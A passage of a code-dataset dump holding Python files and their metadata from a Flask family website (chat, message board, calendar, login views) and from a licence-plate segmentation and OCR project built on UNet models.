"text": "from google.appengine.ext import ndb\nfrom family.utils import pretty_date\n\n\nclass ChatSubscriber(ndb.Model):\n \"\"\" This is simply a persisted list of jids, which is an XMPP chat address\n Here, we use jid as the special unique \"key_name\", an NDB concept that acts as a unique id for the entity\n \"\"\"\n is_online = ndb.BooleanProperty()\n\n @classmethod\n def add_subscriber(cls, jid):\n cls.get_or_insert(jid)\n\n @classmethod\n def remove_subscriber(cls, jid):\n key = ndb.Key(cls, jid)\n key.delete()\n\n\nclass ChatMessage(ndb.Model):\n sender = ndb.StringProperty(required=True)\n body = ndb.StringProperty(required=True)\n posted_date = ndb.DateTimeProperty(auto_now_add=True)\n humanized_posted_date = ndb.ComputedProperty(lambda self: pretty_date(time=self.posted_date))\n\n @classmethod\n def save_message(cls, sender, body):\n message = cls(sender=sender, body=body)\n message.put()\n"
},
{
"alpha_fraction": 0.6516128778457642,
"alphanum_fraction": 0.6516128778457642,
"avg_line_length": 24.83333396911621,
"blob_id": "df40a4075224c5578097eb9362201851becd30f3",
"content_id": "c4db6206be96abf067f863c2e0359dff0201fc8b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 155,
"license_type": "no_license",
"max_line_length": 93,
"num_lines": 6,
"path": "/family/views/__init__.py",
"repo_name": "trungly/thelyfamily",
"src_encoding": "UTF-8",
"text": "import pkgutil\n\n\ndef setup_views():\n for module_loader, name, ispkg in pkgutil.iter_modules(__path__, prefix='family.views.'):\n __import__(name)\n"
},
{
"alpha_fraction": 0.7170417904853821,
"alphanum_fraction": 0.7186495065689087,
"avg_line_length": 28.619047164916992,
"blob_id": "c20e40dde42966a91063f249b395afa1055b780a",
"content_id": "76fefdbf80f2cc2523575f085313ce235b8ceece",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 622,
"license_type": "no_license",
"max_line_length": 97,
"num_lines": 21,
"path": "/family/models/message.py",
"repo_name": "trungly/thelyfamily",
"src_encoding": "UTF-8",
"text": "from markdown2 import markdown\nfrom google.appengine.ext import ndb\nfrom family.models.member import Member\nfrom family.utils import pretty_date\n\n\nclass Message(ndb.Model):\n \"\"\" Represents a message on the message board \"\"\"\n\n owner_key = ndb.KeyProperty(kind=Member)\n body = ndb.TextProperty()\n posted_date = ndb.DateTimeProperty()\n humanized_posted_date = ndb.ComputedProperty(lambda self: pretty_date(time=self.posted_date))\n\n @property\n def owner(self):\n return self.owner_key.get() if self.owner_key else None\n\n @property\n def body_formatted(self):\n return markdown(self.body)\n"
},
{
"alpha_fraction": 0.4964788854122162,
"alphanum_fraction": 0.5340375304222107,
"avg_line_length": 22.027027130126953,
"blob_id": "dfc09de18043c97f2ccfad6cf0f4ee84b6432151",
"content_id": "d918d6c2c399e58fe59d573368f8248761523ea4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 852,
"license_type": "no_license",
"max_line_length": 47,
"num_lines": 37,
"path": "/family/views/calendar.py",
"repo_name": "trungly/thelyfamily",
"src_encoding": "UTF-8",
"text": "from family import app\nfrom family.decorators import requires_login\nfrom flask.json import jsonify\nfrom flask.templating import render_template\n\n\[email protected]('/calendar', methods=['GET'])\n@requires_login\ndef calendar():\n return render_template('calendar.html')\n\n\[email protected]('/calendar/events', methods=['GET'])\n@requires_login\ndef calendar_events():\n \"\"\"\n If you have an error you can return:\n {\n \"success\": 0,\n \"error\": \"error message here\"\n }\n :return:\n \"\"\"\n events = {\n \"success\": 1,\n \"result\": [\n {\n \"id\": 293,\n \"title\": \"Event 1\",\n \"url\": \"http://example.com\",\n \"class\": \"event-important\",\n \"start\": 1461394420000,\n \"end\": 1461395520000\n },\n ]\n }\n return jsonify(events)\n"
},
{
"alpha_fraction": 0.6612318754196167,
"alphanum_fraction": 0.66847825050354,
"avg_line_length": 27.06779670715332,
"blob_id": "01bdc4a23b7e1472b4cde8498b6e7755b0a6ef7e",
"content_id": "ea647f6bf81baffc60e2ba92bf179a23f433dfd5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1656,
"license_type": "no_license",
"max_line_length": 73,
"num_lines": 59,
"path": "/family/views/auth.py",
"repo_name": "trungly/thelyfamily",
"src_encoding": "UTF-8",
"text": "from google.appengine.ext import ndb\nfrom werkzeug.exceptions import BadRequest, Unauthorized\nfrom flask import session, g, redirect, url_for, request, jsonify\nfrom family.forms import ChangePasswordForm\nfrom family.models.member import Member\nfrom family.decorators import requires_login\nfrom family import app\n\n\[email protected]_request\ndef add_member_to_global():\n if 'member_id' in session:\n member_key = ndb.Key(Member, session['member_id'])\n g.member = member_key.get()\n\n\[email protected]('/login', methods=['POST'])\ndef login():\n \"\"\" Ajax only. This supports logging in via first_name and password\n \"\"\"\n if not request.is_xhr:\n return BadRequest()\n\n member = Member.query(\n Member.first_name_lowercase == request.form['first_name'].lower()\n ).get()\n\n if member and member.check_password(request.form['password']):\n session['member_id'] = member.key.id()\n if request.form.get('stay_logged_in', False):\n session.permanent = True\n return '', 200\n\n return Unauthorized()\n\n\[email protected]('/password/change', methods=['POST'])\n@requires_login\ndef change_password():\n if not request.is_xhr:\n return BadRequest()\n\n password_form = ChangePasswordForm(request.form)\n if not password_form.validate():\n r = jsonify(password_form.errors)\n return r, 400\n\n if not g.member.check_password(password_form.old_password.data):\n return '', 401\n\n g.member.set_password(request.form['new_password'])\n g.member.put()\n return '', 200\n\n\[email protected]('/logout', methods=['GET'])\ndef logout():\n session.pop('member_id')\n return redirect(url_for('home'))\n"
}
] | 33 |
sebastiancepeda/pedro
|
https://github.com/sebastiancepeda/pedro
|
a99fba453ee2865bbf6f9e29a604ce99dff634a2
|
f606db53aa7ad4f77cd813ac771a0aef3f98b4d8
|
7d5caac5338d52f848bba7cae737e3fd0cd142e5
|
refs/heads/master
| 2023-02-06T04:06:02.395819 | 2020-12-19T17:57:12 | 2020-12-19T17:57:12 | 280,280,514 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6400602459907532,
"alphanum_fraction": 0.6521084308624268,
"avg_line_length": 27.869565963745117,
"blob_id": "039ab0fa3adf1481a2392e068b6ad69a737899fd",
"content_id": "5bcab4c6395396c10f901d7b9a5c062212f90560",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 664,
"license_type": "permissive",
"max_line_length": 74,
"num_lines": 23,
"path": "/cv/seg_models/model_definition.py",
"repo_name": "sebastiancepeda/pedro",
"src_encoding": "UTF-8",
"text": "import segmentation_models as sm\n\nfrom tensorflow import keras\n\n\ndef get_model_definition():\n backbone = 'mobilenet'\n n_classes = 2\n lr = 0.001\n activation = 'softmax'\n pre_process_input = sm.get_preprocessing(backbone)\n optimizer = keras.optimizers.Adam(lr)\n metrics = [\n sm.metrics.FScore(threshold=0.5),\n ]\n model = sm.Linknet(backbone, classes=n_classes, activation=activation,\n encoder_freeze=True)\n if n_classes == 1:\n loss = sm.losses.BinaryFocalLoss()\n else:\n loss = sm.losses.CategoricalFocalLoss()\n model.compile(optimizer, loss, metrics)\n return model, pre_process_input\n"
},
{
"alpha_fraction": 0.5584415793418884,
"alphanum_fraction": 0.5686456561088562,
"avg_line_length": 32.6875,
"blob_id": "6c3019ff7ff8ac73d57988c2164626137a0d6800",
"content_id": "57b15f78be85d91e779b8d047d8390675899eee7",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1078,
"license_type": "permissive",
"max_line_length": 78,
"num_lines": 32,
"path": "/io_utils/image_text_label_generator.py",
"repo_name": "sebastiancepeda/pedro",
"src_encoding": "UTF-8",
"text": "import tensorflow as tf\n\n\nclass ImageTextLabelGenerator(tf.keras.utils.Sequence):\n def __init__(self, data_function, preprocess_input, data_function_params):\n self.x_all = None\n self.y_all = None\n self.index_im = 0\n self.data_function = data_function\n self.preprocess_input = preprocess_input\n self.data_function_params = data_function_params\n self.on_epoch_end()\n\n def __len__(self):\n return len(self.x_all)\n\n def __getitem__(self, index):\n x = self.x_all[self.index_im, :, :, :]\n y = self.y_all[self.index_im, :, :, :]\n x = x.reshape(1, x.shape[0], x.shape[1], x.shape[2])\n y = y.reshape(1, y.shape[0], y.shape[1], y.shape[2])\n self.index_im = self.index_im + 1\n if self.index_im >= len(self.x_all):\n self.on_epoch_end()\n x = self.preprocess_input(x)\n return x, y\n\n def on_epoch_end(self):\n self.index_im = 0\n x_all, y_all = self.data_function(**self.data_function_params)\n self.x_all = x_all\n self.y_all = y_all\n"
},
{
"alpha_fraction": 0.5861386060714722,
"alphanum_fraction": 0.5861386060714722,
"avg_line_length": 21.954545974731445,
"blob_id": "5f8670ecdbd463caafeebb92b29285770e4e42d9",
"content_id": "718c5cad10968fe33095971e0575102f1d96aaae",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 505,
"license_type": "permissive",
"max_line_length": 71,
"num_lines": 22,
"path": "/io_utils/utils.py",
"repo_name": "sebastiancepeda/pedro",
"src_encoding": "UTF-8",
"text": "\"\"\"\n@author: Sebastian Cepeda\n@email: [email protected]\n\"\"\"\nimport pandas as pd\n\n\ndef set_index(meta):\n index = meta.file_name.unique()\n index = pd.DataFrame(data={\n 'file_name': index,\n 'idx': range(len(index)),\n })\n meta = meta.merge(index, on=['file_name'], how='left')\n return meta\n\n\nclass CustomLogger:\n\n def __init__(self, prefix, base_logger):\n self.info = lambda msg: base_logger.info(f\"[{prefix}] {msg}\")\n self.debug = lambda msg: base_logger.debug(f\"[{prefix}] {msg}\")\n"
},
{
"alpha_fraction": 0.5945945978164673,
"alphanum_fraction": 0.6332046389579773,
"avg_line_length": 16.266666412353516,
"blob_id": "5e75da8c46dc10274cef5d3ae26da2e21c2ec9b4",
"content_id": "7234b8ec4ec4a0035849d5a0c9773de0cb82ccaa",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 259,
"license_type": "permissive",
"max_line_length": 52,
"num_lines": 15,
"path": "/cv/pytorch/tests/test_unet_small.py",
"repo_name": "sebastiancepeda/pedro",
"src_encoding": "UTF-8",
"text": "\"\"\"\n@author: Sebastian Cepeda\n@email: [email protected]\n\"\"\"\n\nimport torch\n\nfrom cv.pytorch.unet_small import UNetSmall\n\n\ndef test_unet_small():\n image = torch.rand((1, 1, 572, 572))\n model = UNetSmall(in_channels=1, out_channels=2)\n y = model(image)\n print(y.size())\n"
},
{
"alpha_fraction": 0.6006389856338501,
"alphanum_fraction": 0.6038338541984558,
"avg_line_length": 29.859155654907227,
"blob_id": "4e344b72ee357049a0a9b401a75f2891aed32e3f",
"content_id": "fb6d14858f1179c4b21f7be635c17e691d3043ac",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2191,
"license_type": "permissive",
"max_line_length": 77,
"num_lines": 71,
"path": "/cv/tensorflow_models/tensorflow_utils.py",
"repo_name": "sebastiancepeda/pedro",
"src_encoding": "UTF-8",
"text": "import os\n\nfrom tensorflow import keras\n\n\ndef train_model(x_train, y_train, x_val, y_val, get_model_definition, params,\n logger):\n epochs = params['epochs']\n model_file = params['model_file']\n model_folder = params['model_folder']\n model_params = params['model_params']\n #\n model, preprocess_input = get_model_definition(**model_params)\n x_train = preprocess_input(x_train)\n x_val = preprocess_input(x_val)\n callbacks = [\n keras.callbacks.ModelCheckpoint(\n model_file,\n save_weights_only=True,\n # save_best_only=False,\n save_best_only=True,\n mode='min'),\n ]\n if not os.path.exists(model_folder):\n os.makedirs(model_folder)\n # Training model\n model.fit(\n x=x_train,\n y=y_train,\n batch_size=1, # 16,\n epochs=epochs,\n validation_data=(x_val, y_val),\n callbacks=callbacks,\n )\n model.load_weights(model_file)\n return model\n\n\ndef train_model_gen(data_train, data_val, model, params, logger):\n epochs = params['epochs']\n model_file = params['model_file']\n model_folder = params['model_folder']\n model_checkpoint_callback = keras.callbacks.ModelCheckpoint(\n model_file,\n save_weights_only=True,\n save_best_only=False, # save_best_only=True,\n mode='min')\n tensorboard_callback = keras.callbacks.TensorBoard(\n log_dir='./graphs', histogram_freq=0, batch_size=32,\n write_graph=False, write_grads=False, write_images=False,\n embeddings_freq=0, embeddings_layer_names=None,\n embeddings_metadata=None, embeddings_data=None,\n update_freq='epoch')\n callbacks = [\n model_checkpoint_callback,\n tensorboard_callback\n ]\n if not os.path.exists(model_folder):\n os.makedirs(model_folder)\n # Training model\n model.fit(\n x=data_train,\n steps_per_epoch=len(data_train),\n epochs=epochs,\n validation_data=data_val,\n validation_steps=len(data_val),\n shuffle=False,\n callbacks=callbacks,\n )\n model.load_weights(model_file)\n return model\n"
},
{
"alpha_fraction": 0.5040720105171204,
"alphanum_fraction": 0.5610801577568054,
"avg_line_length": 29.697368621826172,
"blob_id": "983afff890c593cbd743e35b23d69919770e23f2",
"content_id": "5812e85e3efb452f84c3535c2dd9577b8e0f3d0a",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2333,
"license_type": "permissive",
"max_line_length": 74,
"num_lines": 76,
"path": "/cv/pytorch/unet_small.py",
"repo_name": "sebastiancepeda/pedro",
"src_encoding": "UTF-8",
"text": "\"\"\"\n@author: Sebastian Cepeda\n@email: [email protected]\n\"\"\"\n\nimport torch\nimport torch.nn as nn\nfrom loguru import logger\n\n\ndef double_conv(in_c, out_c):\n conv = nn.Sequential(\n nn.Conv2d(in_c, out_c, kernel_size=3),\n nn.ReLU(inplace=True),\n nn.Conv2d(out_c, out_c, kernel_size=3),\n nn.ReLU(inplace=True),\n )\n return conv\n\n\ndef crop_img(in_tensor, out_tensor):\n out_size = out_tensor.size()[2]\n in_size = in_tensor.size()[2]\n delta = in_size - out_size\n delta = delta // 2\n result = in_tensor[:, :, delta:in_size - delta, delta:in_size - delta]\n return result\n\n\nclass UNetSmall(nn.Module):\n\n def __init__(self, in_channels, out_channels):\n super(UNetSmall, self).__init__()\n # Down convolutions\n self.max_pool_2x2 = nn.MaxPool2d(kernel_size=2, stride=2)\n self.down_conv_1 = double_conv(in_channels, 64)\n self.down_conv_2 = double_conv(64, 128)\n self.down_conv_3 = double_conv(128, 256)\n self.down_conv_4 = double_conv(256, 512)\n self.down_conv_5 = double_conv(512, 1024)\n # Up convolutions\n self.up_trans_1 = nn.ConvTranspose2d(\n in_channels=1024, out_channels=512,\n kernel_size=2, stride=2)\n self.up_conv_1 = double_conv(1024, 512)\n self.up_trans_2 = nn.ConvTranspose2d(\n in_channels=512, out_channels=256,\n kernel_size=2, stride=2)\n self.up_conv_2 = double_conv(512, 256)\n self.up_trans_3 = nn.ConvTranspose2d(\n in_channels=256, out_channels=128,\n kernel_size=2, stride=2)\n self.up_conv_3 = double_conv(256, 128)\n self.up_trans_4 = nn.ConvTranspose2d(\n in_channels=128, out_channels=64,\n kernel_size=2, stride=2)\n self.up_conv_4 = double_conv(128, 64)\n self.out = nn.Conv2d(\n in_channels=64,\n out_channels=out_channels,\n kernel_size=1\n )\n\n def forward(self, image):\n # Encoder\n x1 = self.down_conv_1(image)\n x3 = self.max_pool_2x2(x1)\n x3 = self.down_conv_2(x3)\n # Decoder\n y = crop_img(x3, x3)\n x = self.up_conv_3(torch.cat([x3, y], 1))\n x = self.up_trans_4(x)\n y = crop_img(x1, x)\n x = self.up_conv_4(torch.cat([x, y], 1))\n x = self.out(x)\n return x\n"
},
{
"alpha_fraction": 0.6171460747718811,
"alphanum_fraction": 0.6347464323043823,
"avg_line_length": 38.72932434082031,
"blob_id": "4962cf1b9d79b69c008fe6794a7e60a45bbcc5b2",
"content_id": "0bf96a09eb0acc51cd51bae16bb5f893401dd348",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5284,
"license_type": "permissive",
"max_line_length": 95,
"num_lines": 133,
"path": "/services/plate_ocr/inference.py",
"repo_name": "sebastiancepeda/pedro",
"src_encoding": "UTF-8",
"text": "import cv2\nimport pandas as pd\nimport numpy as np\nfrom loguru import logger\n\nfrom cv.image_processing import (\n pred2im, save_image\n)\nfrom cv.tensorflow_models.unet2text3 import (normalize_image_shape)\nfrom cv.tensorflow_models.unet2text3 import get_model_definition as plate_ocr_model_def\nfrom io_utils.data_source import (\n get_image_text_label, get_plates_text_metadata)\nfrom io_utils.utils import set_index\n\n\ndef get_params():\n path = '/home/sebastian/projects/pedro/data'\n input_folder = f'{path}/plates/plate_segmentation'\n output_folder = f'{path}/plates/plate_ocr'\n width = 200\n height = 50\n ocr_height, ocr_width = normalize_image_shape(50, 200)\n alphabet = ' abcdefghijklmnopqrstuvwxyz0123456789'\n alphabet = {char: idx for char, idx in zip(alphabet, range(len(alphabet)))}\n params = {\n 'input_folder': input_folder,\n 'output_folder': output_folder,\n 'plate_dsize': (ocr_height, ocr_width),\n 'plate_ocr_model_file': f'{output_folder}/model/best_model.h5',\n 'metadata': f\"{path}/plates/input/labels/ocr/files.csv\",\n 'alphabet': alphabet,\n 'debug_level': 1,\n 'plate_ocr_model_params': {\n 'img_height': ocr_height,\n 'img_width': ocr_width,\n 'in_channels': 1,\n 'out_channels': len(alphabet),\n },\n }\n return params\n\n\ndef draw_rectangle(im, r):\n x, y, w, h = r\n im = cv2.rectangle(im, (x, y), (x + w, y + h), (0, 255, 0), 2)\n return im\n\n\ndef image_ocr(event, context):\n logger = context['logger']\n out_folder = context['output_folder']\n debug_level = context['debug_level']\n plate_ocr_model = context['plate_ocr_model']\n plate_ocr_preprocessing = context['plate_ocr_preprocessing']\n in_channels = context['plate_ocr_model_params']['in_channels']\n dsize = context['plate_dsize']\n image = event['image']\n filename = event['file']\n rectangle = event['rectangle']\n image_debug = event['image_debug']\n if image is None:\n result = {\n 'filename': filename,\n 'text': 'none_image',\n }\n return result\n if len(image.shape) == 3 and image.shape[2] == 3:\n image = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n rectangle_point = rectangle.mean(axis=0).astype(int)\n image = cv2.resize(image, dsize=(dsize[1], dsize[0]), interpolation=cv2.INTER_CUBIC)\n image = np.reshape(image, dsize)\n image_pred = plate_ocr_preprocessing(image)\n image_pred = image_pred.reshape(1, dsize[0], dsize[1], in_channels)\n image_pred = plate_ocr_model.predict(image_pred)\n image_pred = np.argmax(image_pred, axis=3)\n alphabet = context['alphabet']\n inv_alphabet = {alphabet[char]: char for char in alphabet.keys()}\n image_pred = image_pred.flatten().tolist()\n text_pred = [inv_alphabet[idx] for idx in image_pred]\n text_pred = ''.join(text_pred)\n text_pred = text_pred.upper().strip()\n file_shortname = filename.split('/')[-1].split('.')[0]\n logger.info(f\"[{file_shortname}] detected text: {text_pred.upper()}\")\n if debug_level > 0:\n font = cv2.FONT_HERSHEY_TRIPLEX\n pos1 = (rectangle_point[0], rectangle_point[1]+100)\n pos2 = (rectangle_point[0]+200, rectangle_point[1]+200)\n image_debug = cv2.rectangle(image_debug, pos1, pos2, (0, 0, 0), -1)\n line = cv2.LINE_AA\n pos = (rectangle_point[0], rectangle_point[1] + 150)\n image_debug = cv2.putText(image_debug, text_pred, pos, font, 1, (0, 255, 0), 2, line)\n save_image(image_debug, f\"{out_folder}/image_debug_text_{file_shortname}.png\")\n result = {\n 'filename': filename,\n 'text': text_pred,\n }\n return result\n\n\ndef ocr_plates(params, logger):\n model_file = params['plate_ocr_model_file']\n input_folder = params['input_folder']\n dsize = params['plate_dsize']\n in_channels = params['plate_ocr_model_params']['in_channels']\n out_channels = params['plate_ocr_model_params']['out_channels']\n model_params = params['plate_ocr_model_params']\n alphabet = params['alphabet']\n logger.info(\"Loading model\")\n plate_ocr_model, plate_ocr_preprocessing = plate_ocr_model_def(**model_params)\n plate_ocr_model.load_weights(model_file)\n logger.info(\"Loading data\")\n meta = get_plates_text_metadata(params)\n meta.file_name = 'plate_' + meta.file_name\n meta.file_name = meta.file_name.str.split('.').str[0]+'.png'\n meta = set_index(meta)\n x, _ = get_image_text_label(input_folder, meta, dsize, in_channels, out_channels, alphabet)\n images = map(lambda idx: pred2im(x, dsize, idx, in_channels), range(len(x)))\n context = {\n 'plate_ocr_model': plate_ocr_model,\n 'plate_ocr_preprocessing': plate_ocr_preprocessing,\n 'logger': logger,\n }\n context.update(params)\n events = [{'image': im, 'file': filename, 'ejec_id': ejec_id\n } for ejec_id, filename, im in zip(range(len(meta)), meta.file_name, images)]\n results = map(lambda e: image_ocr(event=e, context=context), events)\n results = map(lambda e: {k: e[k] for k in ('filename', 'text')}, results)\n results = pd.DataFrame(results)\n results.to_csv(f\"{params['output_folder']}/ocr_events_results.csv\")\n\n\nif __name__ == \"__main__\":\n ocr_plates(get_params(), logger)\n"
},
{
"alpha_fraction": 0.5295150279998779,
"alphanum_fraction": 0.5916172862052917,
"avg_line_length": 37.9487190246582,
"blob_id": "7a2f00c5ac292026e9fd8ae768d446d0e5b53819",
"content_id": "8888ba36c448050a54aaecf84637f9de0c6e9a59",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4557,
"license_type": "permissive",
"max_line_length": 79,
"num_lines": 117,
"path": "/cv/tensorflow_models/unet.py",
"repo_name": "sebastiancepeda/pedro",
"src_encoding": "UTF-8",
"text": "\"\"\"\n@author: Sebastian Cepeda\n@email: [email protected]\n\"\"\"\n\nfrom tensorflow.keras import Model\nfrom tensorflow.keras.layers import (\n Conv2D, Conv2DTranspose, BatchNormalization, Dropout, Lambda, Input,\n MaxPooling2D, concatenate,\n)\n\n\ndef identity_function(x):\n return x\n\n\ndef get_model_definition(img_height, img_width, in_channels, out_channels):\n base = (2 ** 4)\n msg = \"{actual} not multiple of \" + str(base)\n assert img_height % base == 0, msg.format(actual=img_height)\n assert img_width % base == 0, msg.format(actual=img_width)\n drop_p = 0.1\n inputs = Input((img_height, img_width, in_channels))\n pre_processing = Lambda(lambda x: x / 255)(inputs)\n c1 = Conv2D(64, (3, 3), activation='relu', kernel_initializer='he_normal',\n padding='same')(pre_processing)\n c1 = BatchNormalization()(c1)\n c1 = Dropout(drop_p)(c1)\n c1 = Conv2D(64, (3, 3), activation='relu', kernel_initializer='he_normal',\n padding='same')(c1)\n c1 = BatchNormalization()(c1)\n\n c2 = MaxPooling2D((2, 2))(c1)\n c2 = Conv2D(128, (3, 3), activation='relu', kernel_initializer='he_normal',\n padding='same')(c2)\n c2 = BatchNormalization()(c2)\n c2 = Dropout(drop_p)(c2)\n c2 = Conv2D(128, (3, 3), activation='relu', kernel_initializer='he_normal',\n padding='same')(c2)\n c2 = BatchNormalization()(c2)\n\n c3 = MaxPooling2D((2, 2))(c2)\n c3 = Conv2D(256, (3, 3), activation='relu', kernel_initializer='he_normal',\n padding='same')(c3)\n c3 = BatchNormalization()(c3)\n c3 = Dropout(drop_p)(c3)\n c3 = Conv2D(256, (3, 3), activation='relu', kernel_initializer='he_normal',\n padding='same')(c3)\n c3 = BatchNormalization()(c3)\n\n c4 = MaxPooling2D((2, 2))(c3)\n c4 = Conv2D(512, (3, 3), activation='relu', kernel_initializer='he_normal',\n padding='same')(c4)\n c4 = BatchNormalization()(c4)\n c4 = Dropout(drop_p)(c4)\n c4 = Conv2D(512, (3, 3), activation='relu', kernel_initializer='he_normal',\n padding='same')(c4)\n c4 = BatchNormalization()(c4)\n\n c5 = MaxPooling2D(pool_size=(2, 2))(c4)\n c5 = Conv2D(1024, (3, 3), activation='relu',\n kernel_initializer='he_normal',\n padding='same')(c5)\n c5 = BatchNormalization()(c5)\n c5 = Dropout(drop_p)(c5)\n c5 = Conv2D(1024, (3, 3), activation='relu',\n kernel_initializer='he_normal',\n padding='same')(c5)\n c5 = BatchNormalization()(c5)\n\n u6 = Conv2DTranspose(512, (2, 2), strides=(2, 2), padding='same')(c5)\n u6 = concatenate([u6, c4])\n c6 = Conv2D(512, (3, 3), activation='relu', kernel_initializer='he_normal',\n padding='same')(u6)\n c6 = BatchNormalization()(c6)\n c6 = Dropout(drop_p)(c6)\n c6 = Conv2D(512, (3, 3), activation='relu', kernel_initializer='he_normal',\n padding='same')(c6)\n c6 = BatchNormalization()(c6)\n\n u7 = Conv2DTranspose(256, (2, 2), strides=(2, 2), padding='same')(c6)\n u7 = concatenate([u7, c3])\n c7 = Conv2D(256, (3, 3), activation='relu', kernel_initializer='he_normal',\n padding='same')(u7)\n c7 = BatchNormalization()(c7)\n c7 = Dropout(drop_p)(c7)\n c7 = Conv2D(256, (3, 3), activation='relu', kernel_initializer='he_normal',\n padding='same')(c7)\n c7 = BatchNormalization()(c7)\n\n u8 = Conv2DTranspose(128, (2, 2), strides=(2, 2), padding='same')(c7)\n u8 = concatenate([u8, c2])\n c8 = Conv2D(128, (3, 3), activation='relu', kernel_initializer='he_normal',\n padding='same')(u8)\n c8 = BatchNormalization()(c8)\n c8 = Dropout(drop_p)(c8)\n c8 = Conv2D(128, (3, 3), activation='relu', kernel_initializer='he_normal',\n padding='same')(c8)\n c8 = BatchNormalization()(c8)\n\n u9 = Conv2DTranspose(64, (2, 2), strides=(2, 2), padding='same')(c8)\n u9 = concatenate([u9, c1], axis=3)\n c9 = Conv2D(64, (3, 3), activation='relu', kernel_initializer='he_normal',\n padding='same')(u9)\n c9 = BatchNormalization()(c9)\n c9 = Dropout(drop_p)(c9)\n c9 = Conv2D(64, (3, 3), activation='relu', kernel_initializer='he_normal',\n padding='same')(c9)\n c9 = BatchNormalization()(c9)\n\n outputs = Conv2D(out_channels, (1, 1), activation='sigmoid')(c9)\n\n model = Model(inputs=[inputs], outputs=[outputs])\n model.compile(optimizer='adam', loss='binary_crossentropy',\n metrics=['accuracy'])\n pre_process_input = identity_function\n return model, pre_process_input\n"
},
{
"alpha_fraction": 0.6199007630348206,
"alphanum_fraction": 0.6380926370620728,
"avg_line_length": 38.868133544921875,
"blob_id": "bf21c2f4f10328ad6cca7ee7de5d07e8657a21db",
"content_id": "093fa8df0451f4553e45298cbc4400e915a0a7d4",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3628,
"license_type": "permissive",
"max_line_length": 129,
"num_lines": 91,
"path": "/services/alpr/inference.py",
"repo_name": "sebastiancepeda/pedro",
"src_encoding": "UTF-8",
"text": "import glob\nimport pandas as pd\n\nfrom cv.tensorflow_models.unet2text3 import (normalize_image_shape)\nfrom cv.tensorflow_models.unet_little import get_model_definition as plate_seg_model_def\nfrom cv.tensorflow_models.unet2text3 import get_model_definition as plate_ocr_model_def\nfrom services.plate_segmentation.inference import plate_segmentation\nfrom services.plate_ocr.inference import image_ocr\n\n\ndef get_params():\n path = '/home/sebastian/projects/pedro/data'\n input_folder = f'{path}/plates/input/'\n output_folder = f'{path}/plates/alpr'\n dsize = (256, 256)\n alphabet = ' abcdefghijklmnopqrstuvwxyz0123456789'\n alphabet = {char: idx for char, idx in zip(alphabet, range(len(alphabet)))}\n big_shape = (1024, 1024)\n plate_shape = (200, 50)\n color = (255, 0, 0)\n thickness = 3\n debug_level = 1\n min_pct = 0.04\n max_pct = 0.20\n ocr_height, ocr_width = normalize_image_shape(50, 200)\n min_area = (big_shape[0] * min_pct) * (big_shape[1] * min_pct)\n max_area = (big_shape[0] * max_pct) * (big_shape[1] * max_pct)\n train_files = glob.glob(f\"{input_folder}/train/*.jpg\")\n test_files = glob.glob(f\"{input_folder}/test/*.jpg\")\n files = train_files + test_files\n params = {\n 'input_folder': input_folder,\n 'output_folder': output_folder,\n 'files': files,\n 'plate_shape': plate_shape,\n 'color': color,\n 'thickness': thickness,\n 'debug_level': debug_level,\n 'dsize': dsize,\n 'plate_dsize': (ocr_height, ocr_width),\n 'plate_segmentation_model_file': f\"{path}/plates/plate_segmentation/model/best_model.h5\",\n 'plate_ocr_model_file': f\"{path}/plates/plate_ocr/model/best_model.h5\",\n 'alphabet': alphabet,\n 'big_shape': big_shape,\n 'min_area': min_area,\n 'max_area': max_area,\n 'plate_ocr_model_params': {\n 'img_height': ocr_height,\n 'img_width': ocr_width,\n 'in_channels': 1,\n 'out_channels': len(alphabet),\n },\n 'plate_segmentation_model_params': {\n 'img_height': 256,\n 'img_width': 256,\n 'in_channels': 3,\n 'out_channels': 2,\n },\n }\n return params\n\n\ndef alpr_inference(params):\n from loguru import logger\n\n logger.add(f\"{params['output_folder']}/logger.log\")\n logger.info(\"Loading model\")\n plate_segmentation_model, plate_segmentation_preprocessing = plate_seg_model_def(**params['plate_segmentation_model_params'])\n plate_segmentation_model.load_weights(params['plate_segmentation_model_file'])\n plate_ocr_model, plate_ocr_preprocessing = plate_ocr_model_def(**params['plate_ocr_model_params'])\n plate_ocr_model.load_weights(params['plate_ocr_model_file'])\n logger.info(\"Loading data\")\n files = params['files']\n context = {\n 'logger': logger,\n 'plate_ocr_model': plate_ocr_model,\n 'plate_ocr_preprocessing': plate_ocr_preprocessing,\n 'plate_segmentation_model': plate_segmentation_model,\n 'plate_segmentation_preprocessing': plate_segmentation_preprocessing,\n }\n context.update(params)\n events = [{'image_file': f, 'ejec_id': ejec_id} for ejec_id, f in enumerate(files)]\n results = map(lambda e: plate_segmentation(event=e, context=context), events)\n results = map(lambda e: image_ocr(event=e, context=context), results)\n results = map(lambda e: {k: e[k] for k in ('filename', 'text')}, results)\n results = pd.DataFrame(results)\n results.to_csv(f\"{params['output_folder']}/ocr_events_results.csv\")\n\n\nif __name__ == \"__main__\":\n alpr_inference(get_params())\n"
},
{
"alpha_fraction": 0.5843495726585388,
"alphanum_fraction": 0.5955284833908081,
"avg_line_length": 34.14285659790039,
"blob_id": "68c455433d8eae727bb7c31d61ce1e10e19c2c15",
